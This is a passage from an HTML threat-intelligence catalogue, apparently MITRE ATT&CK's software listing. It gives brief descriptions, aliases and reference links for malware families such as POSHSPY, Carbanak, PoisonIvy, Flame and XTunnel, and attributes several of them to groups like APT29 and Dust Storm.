<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0013">https://attack.mitre.org/wiki/Software/S0013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html">https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://labs.lastline.com/an-analysis-of-plugx">http://labs.lastline.com/an-analysis-of-plugx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/">http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poshspy"><a class="anchor" href="#_poshspy"></a><a class="link" href="#_poshspy">POSHSPY</a></h3>
<div class="paragraph">
<p>POSHSPY is a backdoor that has been used by APT29 since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors.[[Citation: FireEye POSHSPY April 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1246. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0150">https://attack.mitre.org/wiki/Software/S0150</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/dissecting%20one%20ofap.html">https://www.fireeye.com/blog/threat-research/2017/03/dissecting%20one%20ofap.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_misdat"><a class="anchor" href="#_misdat"></a><a class="link" href="#_misdat">Misdat</a></h3>
<div class="paragraph">
<p>Misdat is a backdoor that was used by Dust Storm from 2010 to 2011.[[Citation: Cylance Dust Storm]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1247. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0083">https://attack.mitre.org/wiki/Software/S0083</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512">https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_taidoor_2"><a class="anchor" href="#_taidoor_2"></a><a class="link" href="#_taidoor_2">Taidoor</a></h3>
<div class="paragraph">
<p>Taidoor is malware that has been used since at least 2010, primarily to target Taiwanese government organizations.[[Citation: TrendMicro Taidoor]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1248. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0011">https://attack.mitre.org/wiki/Software/S0011</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moonwind"><a class="anchor" href="#_moonwind"></a><a class="link" href="#_moonwind">MoonWind</a></h3>
<div class="paragraph">
<p>MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.[[Citation: Palo Alto MoonWind March 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1249. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0149">https://attack.mitre.org/wiki/Software/S0149</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/">http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crimson"><a class="anchor" href="#_crimson"></a><a class="link" href="#_crimson">Crimson</a></h3>
<div class="paragraph">
<p>Crimson is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims.[[Citation: Proofpoint Operation Transparent Tribe March 2016]]</p>
</div>
<div class="paragraph">
<p>Aliases: Crimson, MSIL/Crimson</p>
</div>
<div class="paragraph">
<p>Crimson is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Crimson</p>
</li>
<li>
<p>MSIL/Crimson</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1250. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0115">https://attack.mitre.org/wiki/Software/S0115</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf">https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rover"><a class="anchor" href="#_rover"></a><a class="link" href="#_rover">Rover</a></h3>
<div class="paragraph">
<p>Rover is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan.[[Citation: Palo Alto Rover]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1251. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0090">https://attack.mitre.org/wiki/Software/S0090</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/">http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zlib"><a class="anchor" href="#_zlib"></a><a class="link" href="#_zlib">ZLib</a></h3>
<div class="paragraph">
<p>ZLib is a full-featured backdoor that was used as a second-stage implant by Dust Storm from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived.[[Citation: Cylance Dust Storm]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1252. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0086">https://attack.mitre.org/wiki/Software/S0086</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512">https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powerduke"><a class="anchor" href="#_powerduke"></a><a class="link" href="#_powerduke">PowerDuke</a></h3>
<div class="paragraph">
<p>PowerDuke is a backdoor that was used by APT29 in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros.[[Citation: Volexity PowerDuke November 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1253. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0139">https://attack.mitre.org/wiki/Software/S0139</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/">https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_httpbrowser"><a class="anchor" href="#_httpbrowser"></a><a class="link" href="#_httpbrowser">HTTPBrowser</a></h3>
<div class="paragraph">
<p>HTTPBrowser is malware that has been used by several threat groups.[[Citation: ThreatStream Evasion Analysis]][[Citation: Dell TG-3390]] It is believed to be of Chinese origin.[[Citation: ThreatConnect Anthem]]</p>
</div>
<div class="paragraph">
<p>Aliases: HTTPBrowser, Token Control, HttpDump</p>
</div>
<div class="paragraph">
<p>HTTPBrowser is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HTTPBrowser</p>
</li>
<li>
<p>Token Control</p>
</li>
<li>
<p>HttpDump</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1254. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0070">https://attack.mitre.org/wiki/Software/S0070</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop">https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/">https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hammertoss"><a class="anchor" href="#_hammertoss"></a><a class="link" href="#_hammertoss">HAMMERTOSS</a></h3>
<div class="paragraph">
<p>HAMMERTOSS is a backdoor that was used by APT29 in 2015.[[Citation: FireEye APT29]][[Citation: F-Secure The Dukes]]</p>
</div>
<div class="paragraph">
<p>Aliases: HAMMERTOSS, HammerDuke, NetDuke</p>
</div>
<div class="paragraph">
<p>HAMMERTOSS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HAMMERTOSS</p>
</li>
<li>
<p>HammerDuke</p>
</li>
<li>
<p>NetDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1255. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0037">https://attack.mitre.org/wiki/Software/S0037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poisonivy"><a class="anchor" href="#_poisonivy"></a><a class="link" href="#_poisonivy">PoisonIvy</a></h3>
<div class="paragraph">
<p>PoisonIvy is a popular remote access tool (RAT) that has been used by many groups.[[Citation: FireEye Poison Ivy]]</p>
</div>
<div class="paragraph">
<p>Aliases: PoisonIvy, Poison Ivy</p>
</div>
<div class="paragraph">
<p>PoisonIvy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PoisonIvy</p>
</li>
<li>
<p>Poison Ivy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1256. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0012">https://attack.mitre.org/wiki/Software/S0012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_carbanak_2"><a class="anchor" href="#_carbanak_2"></a><a class="link" href="#_carbanak_2">Carbanak</a></h3>
<div class="paragraph">
<p>Carbanak is a remote backdoor used by a group of the same name (Carbanak). It is intended for espionage, data exfiltration, and providing remote access to infected machines.[[Citation: Kaspersky Carbanak]]</p>
</div>
<div class="paragraph">
<p>Aliases: Carbanak, Anunak</p>
</div>
<div class="paragraph">
<p>Carbanak is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Carbanak</p>
</li>
<li>
<p>Anunak</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1257. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0030">https://attack.mitre.org/wiki/Software/S0030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf">https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ixeshe"><a class="anchor" href="#_ixeshe"></a><a class="link" href="#_ixeshe">Ixeshe</a></h3>
<div class="paragraph">
<p>Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia.[[Citation: Moran 2013]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1258. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0015">https://attack.mitre.org/wiki/Software/S0015</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html">https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_badnews"><a class="anchor" href="#_badnews"></a><a class="link" href="#_badnews">BADNEWS</a></h3>
<div class="paragraph">
<p>BADNEWS is malware that has been used by the actors responsible for the MONSOON campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control.[[Citation: Forcepoint Monsoon]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1259. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0128">https://attack.mitre.org/wiki/Software/S0128</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flame"><a class="anchor" href="#_flame"></a><a class="link" href="#_flame">Flame</a></h3>
<div class="paragraph">
<p>Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries.[[Citation: Kaspersky Flame]]</p>
</div>
<div class="paragraph">
<p>Aliases: Flame, Flamer, sKyWIper</p>
</div>
<div class="paragraph">
<p>Flame is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Flame</p>
</li>
<li>
<p>Flamer</p>
</li>
<li>
<p>sKyWIper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1260. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0143">https://attack.mitre.org/wiki/Software/S0143</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/34344/the-flame-questions-and-answers-51/">https://securelist.com/blog/incidents/34344/the-flame-questions-and-answers-51/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_riptide"><a class="anchor" href="#_riptide"></a><a class="link" href="#_riptide">RIPTIDE</a></h3>
<div class="paragraph">
<p>RIPTIDE is a proxy-aware backdoor used by APT12.[[Citation: Moran 2014]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1261. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0003">https://attack.mitre.org/wiki/Software/S0003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html">https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cozycar"><a class="anchor" href="#_cozycar"></a><a class="link" href="#_cozycar">CozyCar</a></h3>
<div class="paragraph">
<p>CozyCar is malware that was used by APT29 from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality.[[Citation: F-Secure The Dukes]]</p>
</div>
<div class="paragraph">
<p>Aliases: CozyCar, CozyDuke, CozyBear, Cozer, EuroAPT</p>
</div>
<div class="paragraph">
<p>CozyCar is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CozyCar</p>
</li>
<li>
<p>CozyDuke</p>
</li>
<li>
<p>CozyBear</p>
</li>
<li>
<p>Cozer</p>
</li>
<li>
<p>EuroAPT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1262. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0046">https://attack.mitre.org/wiki/Software/S0046</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mivast"><a class="anchor" href="#_mivast"></a><a class="link" href="#_mivast">Mivast</a></h3>
<div class="paragraph">
<p>Mivast is a backdoor that has been used by Deep Panda. It was reportedly used in the Anthem breach.[[Citation: Symantec Black Vine]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1263. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0080">https://attack.mitre.org/wiki/Software/S0080</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cherry_picker"><a class="anchor" href="#_cherry_picker"></a><a class="link" href="#_cherry_picker">Cherry Picker</a></h3>
<div class="paragraph">
<p>Cherry Picker is a point of sale (PoS) memory scraper.[[Citation: Trustwave Cherry Picker]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1264. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0107">https://attack.mitre.org/wiki/Software/S0107</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xtunnel"><a class="anchor" href="#_xtunnel"></a><a class="link" href="#_xtunnel">XTunnel</a></h3>
<div class="paragraph">
<p>XTunnel a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by APT28 during the compromise of the Democratic National Committee.[[Citation: Crowdstrike DNC June 2016]][[Citation: Invincea XTunnel]][[Citation: ESET Sednit Part 2]]</p>
</div>
<div class="paragraph">
<p>Aliases: XTunnel, X-Tunnel, XAPS</p>
</div>
<div class="paragraph">
<p>XTunnel is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XTunnel</p>
</li>
<li>
<p>X-Tunnel</p>
</li>
<li>
<p>XAPS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1265. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0117">https://attack.mitre.org/wiki/Software/S0117</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/">https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_geminiduke"><a class="anchor" href="#_geminiduke"></a><a class="link" href="#_geminiduke">GeminiDuke</a></h3>
<div class="paragraph">
<p>GeminiDuke is malware that was used by APT29 from 2009 to 2012.[[Citation: F-Secure The Dukes]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1266. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0049">https://attack.mitre.org/wiki/Software/S0049</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sakula"><a class="anchor" href="#_sakula"></a><a class="link" href="#_sakula">Sakula</a></h3>
<div class="paragraph">
<p>Sakula is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015.[[Citation: Dell Sakula]]</p>
</div>
<div class="paragraph">
<p>Aliases: Sakula, Sakurel, VIPER</p>
</div>
<div class="paragraph">
<p>Sakula is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sakula</p>
</li>
<li>
<p>Sakurel</p>
</li>
<li>
<p>VIPER</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1267. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0074">https://attack.mitre.org/wiki/Software/S0074</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/">http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_agent_btz"><a class="anchor" href="#_agent_btz"></a><a class="link" href="#_agent_btz">Agent.btz</a></h3>
<div class="paragraph">
<p>Agent.btz is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008.[[Citation: Securelist Agent.btz]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1268. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0092">https://attack.mitre.org/wiki/Software/S0092</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/">https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_prikormka"><a class="anchor" href="#_prikormka"></a><a class="link" href="#_prikormka">Prikormka</a></h3>
<div class="paragraph">
<p>Prikormka is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008.[[Citation: ESET Operation Groundbait]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1269. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
